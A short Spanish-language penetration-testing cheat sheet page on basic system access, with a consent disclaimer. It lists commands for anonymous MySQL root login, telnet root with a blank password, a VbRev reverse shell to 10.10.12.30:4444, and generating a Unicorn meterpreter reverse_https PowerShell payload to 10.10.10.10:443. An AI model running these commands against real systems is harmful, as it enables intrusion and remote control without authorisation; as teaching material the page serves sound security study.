Page cover

🔥Acceso básico

Aquí presento técnicas básicas para acceder a un sistema, algunas vienen derivadas de una mala configuración del servidor.

Nota: Este tipo de técnicas son muy invasivas, ya que vamos a ganar acceso a distintos sistemas, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo

MySQL login anónimo

mysql -h TARGET -u root

Acceso root telnet

  • Opera en el puerto 23/tcp -> telnet

telnet {TARGET}
- Acceso con login “root” con blank password

Reverse Shell GUI en Windows

LogoGitHub - VbScrub/VbRev: Windows reverse shell GUIGitHub

  • Descargamos la última release

  • Desde una máquina windows ejecutamos el exe y nos quedamos a la escucha

  • En la máquina objetivo ejecutamos lo siguiente:

VbRev.exe 10.10.12.30 4444

Unicorn

Unicorn es un programa que nos permite con un comando crear un payload para copiar y pegar en una terminal de Powershell y devolvernos una reverse shell.

LogoGitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.GitHub
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py windows/meterpreter/reverse_https 10.10.10.10 443 ms

Esto nos crea un archivo de texto. Si copiamos y pegamos los comandos que nos da y tenemos un netcat listener abierto en el puerto que le hemos indicado nos devolverá una conexión reversa.

AnteriorExplotación en HostsSiguienteShells y Payloads

Última actualización

¿Te fue útil?